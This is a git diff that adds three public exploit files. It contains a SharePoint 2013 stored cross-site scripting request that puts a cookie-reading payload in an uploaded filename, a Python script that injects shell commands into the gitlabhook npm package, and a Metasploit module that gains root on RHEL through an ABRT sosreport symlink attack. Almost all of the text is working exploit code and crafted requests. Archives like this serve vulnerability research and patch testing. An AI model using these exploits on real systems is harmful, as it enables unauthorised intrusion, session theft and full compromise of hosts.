tbowman01
diff --git a/‎exploits/aspx/webapps/47417.txt
Lines changed: 177 additions & 0 deletions b/‎exploits/aspx/webapps/47417.txt
Lines changed: 177 additions & 0 deletions
diff --git a/‎exploits/json/webapps/47420.txt
Lines changed: 18 additions & 0 deletions b/‎exploits/json/webapps/47420.txt
Lines changed: 18 additions & 0 deletions
diff --git a/‎exploits/linux/local/47421.rb
Lines changed: 160 additions & 0 deletions b/‎exploits/linux/local/47421.rb
Lines changed: 160 additions & 0 deletions
@@ -0,0 +1,177 @@
+# Exploit Title: Microsoft SharePoint 2013 SP1 - 'DestinationFolder' Persistent Cross-Site Scripting
+# Author: Davide Cioccia
+# Discovery Date: 2019-09-25
+# Vendor Homepage: https://www.microsoft.com
+# Software Link: https://support.microsoft.com/en-us/help/2880552/description-of-microsoft-sharepoint-server-2013-service-pack-1-sp1
+# Tested Version: SP1
+# Tested on: Microsoft Windows Server 2016
+# CVE: CVE-2019-1262
+# Advisory ID: ZSL-2019-5533
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5533.php
+# MSRC: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1262
+
+Vendor: Microsoft Corporation
+Product web page: https://www.microsoft.com
+Affected version: 2013 SP1
+
+Summary: SharePoint is a web-based collaborative platform that
+integrates with Microsoft Office. Launched in 2001, SharePoint
+is primarily sold as a document management and storage system,
+but the product is highly configurable and usage varies substantially
+among organizations.
+
+Desc: A cross-site-scripting (XSS) vulnerability exists when Microsoft
+SharePoint Server does not properly sanitize a specially crafted web
+request to an affected SharePoint server. An authenticated attacker
+could exploit the vulnerability by sending a specially crafted request
+to an affected SharePoint server. The attacker who successfully exploited
+the vulnerability could then perform cross-site scripting attacks on
+affected systems and run script in the security context of the current
+user. The attacks could allow the attacker to read content that the
+attacker is not authorized to read, use the victim's identity to take
+actions on the SharePoint site on behalf of the user, such as change
+permissions and delete content, and inject malicious content in the
+browser of the user.
+
+Sharepoint 2013 SP1 allows users to upload files to the platform, but
+does not correctly sanitize the filename when the files are listed. An
+authenticated user that has the rights to upload files to the SharePoint
+platform, is able to exploit a Stored Cross-Site Scripting vulnerability
+in the filename. The filename is reflected in the attribute 'aria-label'
+of the following HTML tag.
+
+# PoC request:
+
+
+POST /FOLDER/_layouts/15/Upload.aspx?List={689D112C-BDAA-4B05-B0CB-0DFB36CF0649}&RootFolder=&IsDlg=1 HTTP/1.1
+Host: vulnerable_sharepoint_2013
+Connection: close
+Content-Length: 31337
+Cache-Control: max-age=0
+Authorization: Negotiate YIIV9gYGKwYBBQUCo........................JBAq39IdJh3yphI1uHbz/jbQ==
+Origin: https://vulnerable_sharepoint_2013.tld
+Upgrade-Insecure-Requests: 1
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryewNI1MC6qaHDB50n
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
+Sec-Fetch-Mode: nested-navigate
+Sec-Fetch-User: ?1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
+Sec-Fetch-Site: same-origin
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9,it-IT;q=0.8,it;q=0.7,nl;q=0.6
+Cookie: ...
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOWebPartPage_PostbackSource"
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOTlPn_SelectedWpId"
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOTlPn_View"
+
+0
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOTlPn_ShowSettings"
+
+False
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOGallery_SelectedLibrary"
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOGallery_FilterString"
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOTlPn_Button"
+
+none
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="__EVENTTARGET"
+
+ctl00$PlaceHolderMain$ctl00$RptControls$btnOK
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="__EVENTARGUMENT"
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOSPWebPartManager_DisplayModeName"
+
+Browse
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOSPWebPartManager_ExitingDesignMode"
+
+false
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOWebPartPage_Shared"
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOLayout_LayoutChanges"
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOLayout_InDesignMode"
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOSPWebPartManager_OldDisplayModeName"
+
+Browse
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOSPWebPartManager_StartWebPartEditingName"
+
+false
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOSPWebPartManager_EndWebPartEditing"
+
+false
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="_maintainWorkspaceScrollPosition"
+
+0
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="__REQUESTDIGEST"
+
+[DIGEST]
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="__VIEWSTATE"
+
+[VIEWSTATE]
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"
+
+E6912F23
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="__SCROLLPOSITIONX"
+
+0
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="__SCROLLPOSITIONY"
+
+0
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="__EVENTVALIDATION"
+
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="destination"
+
+[DESTINATION_FOLDER]
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="ctl00$PlaceHolderMain$ctl01$ctl04$InputFile"; filename="' onmouseover=alert(document.cookie) '.jpg"
+Content-Type: image/jpeg
+
+
+ZSL
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="ctl00$PlaceHolderMain$ctl01$ctl04$OverwriteSingle"
+
+on
+------WebKitFormBoundaryewNI1MC6qaHDB50n--
@@ -0,0 +1,18 @@
+# Exploit Title: NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution
+# Date: 2019-09-13
+# Exploit Author: Semen Alexandrovich Lyhin
+# Vendor Homepage: https://www.npmjs.com/package/gitlabhook
+# Version: 0.0.17
+# Tested on: Kali Linux 2, Windows 10. 
+# CVE : CVE-2019-5485
+
+#!/usr/bin/python
+
+import requests
+
+target = "http://TARGET:3420"
+cmd = r"touch /tmp/poc.txt"
+json = '{"repository":{"name": "Diasporrra\'; %s;\'"}}'% cmd
+r = requests.post(target, json)
+
+print "Done."
@@ -0,0 +1,160 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Post::Linux::Kernel
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'ABRT sosreport Privilege Escalation',
+      'Description'    => %q{
+        This module attempts to gain root privileges on RHEL systems with
+        a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured
+        as the crash handler.
+
+        `sosreport` uses an insecure temporary directory, allowing local users
+        to write to arbitrary files (CVE-2015-5287). This module uses a symlink
+        attack on `/var/tmp/abrt/cc-*$pid/` to overwrite the `modprobe` path
+        in `/proc/sys/kernel/modprobe`, resulting in root privileges.
+
+        Waiting for `sosreport` could take a few minutes.
+
+        This module has been tested successfully on:
+
+        abrt 2.1.11-12.el7 on RHEL 7.0 x86_64; and
+        abrt 2.1.11-19.el7 on RHEL 7.1 x86_64.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'rebel', # Discovery and sosreport-rhel7.py exploit
+          'bcoles' # Metasploit
+        ],
+      'DisclosureDate' => '2015-11-23',
+      'Platform'       => ['linux'],
+      'Arch'           =>
+        [
+          ARCH_X86,
+          ARCH_X64,
+          ARCH_ARMLE,
+          ARCH_AARCH64,
+          ARCH_PPC,
+          ARCH_MIPSLE,
+          ARCH_MIPSBE
+        ],
+      'SessionTypes'   => ['shell', 'meterpreter'],
+      'Targets'        => [[ 'Auto', {} ]],
+      'References'     =>
+        [
+          ['BID', '78137'],
+          ['CVE', '2015-5287'],
+          ['EDB', '38832'],
+          ['URL', 'https://www.openwall.com/lists/oss-security/2015/12/01/1'],
+          ['URL', 'https://access.redhat.com/errata/RHSA-2015:2505'],
+          ['URL', 'https://access.redhat.com/security/cve/CVE-2015-5287'],
+          ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1266837']
+        ]
+    ))
+    register_options [
+      OptInt.new('TIMEOUT', [true, 'Timeout for sosreport (seconds)', '600'])
+    ]
+    register_advanced_options [
+      OptBool.new('ForceExploit',  [false, 'Override check result', false]),
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir']
+  end
+
+  def timeout
+    datastore['TIMEOUT']
+  end
+
+  def check
+    kernel_core_pattern = cmd_exec 'grep abrt-hook-ccpp /proc/sys/kernel/core_pattern'
+    unless kernel_core_pattern.include? 'abrt-hook-ccpp'
+      vprint_error 'System is not configured to use ABRT for crash reporting'
+      return CheckCode::Safe
+    end
+    vprint_good 'System is configured to use ABRT for crash reporting'
+
+    if cmd_exec('systemctl status abrt-ccpp | grep Active').include? 'inactive'
+      vprint_error 'abrt-ccp service not running'
+      return CheckCode::Safe
+    end
+    vprint_good 'abrt-ccpp service is running'
+
+    # Patched in 2.1.11-35.el7
+    pkg_info = cmd_exec('yum list installed abrt | grep abrt').to_s
+    abrt_version = pkg_info[/^abrt.*$/].to_s.split(/\s+/)[1]
+    if abrt_version.blank?
+      vprint_status 'Could not retrieve ABRT package version'
+      return CheckCode::Safe
+    end
+    unless Gem::Version.new(abrt_version) < Gem::Version.new('2.1.11-35.el7')
+      vprint_status "ABRT package version #{abrt_version} is not vulnerable"
+      return CheckCode::Safe
+    end
+    vprint_good "ABRT package version #{abrt_version} is vulnerable"
+
+    unless command_exists? 'python'
+      vprint_error 'python is not installed'
+      return CheckCode::Safe
+    end
+    vprint_good 'python is installed'
+
+    CheckCode::Appears
+  end
+
+  def upload_and_chmodx(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    chmod path
+    register_file_for_cleanup path
+  end
+
+  def exploit
+    unless check == CheckCode::Appears
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+      end
+    end
+
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    exe_data = ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2015-5287', 'sosreport-rhel7.py')
+    exe_name = ".#{rand_text_alphanumeric 5..10}"
+    exe_path = "#{base_dir}/#{exe_name}"
+    upload_and_chmodx exe_path, exe_data
+
+    payload_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}"
+    upload_and_chmodx payload_path, generate_payload_exe
+
+    register_file_for_cleanup '/tmp/hax.sh'
+
+    print_status "Launching exploit - This might take a few minutes (Timeout: #{timeout}s) ..."
+    output = cmd_exec "echo \"#{payload_path}& exit\" | #{exe_path}", nil, timeout
+    output.each_line { |line| vprint_status line.chomp }
+  end
+end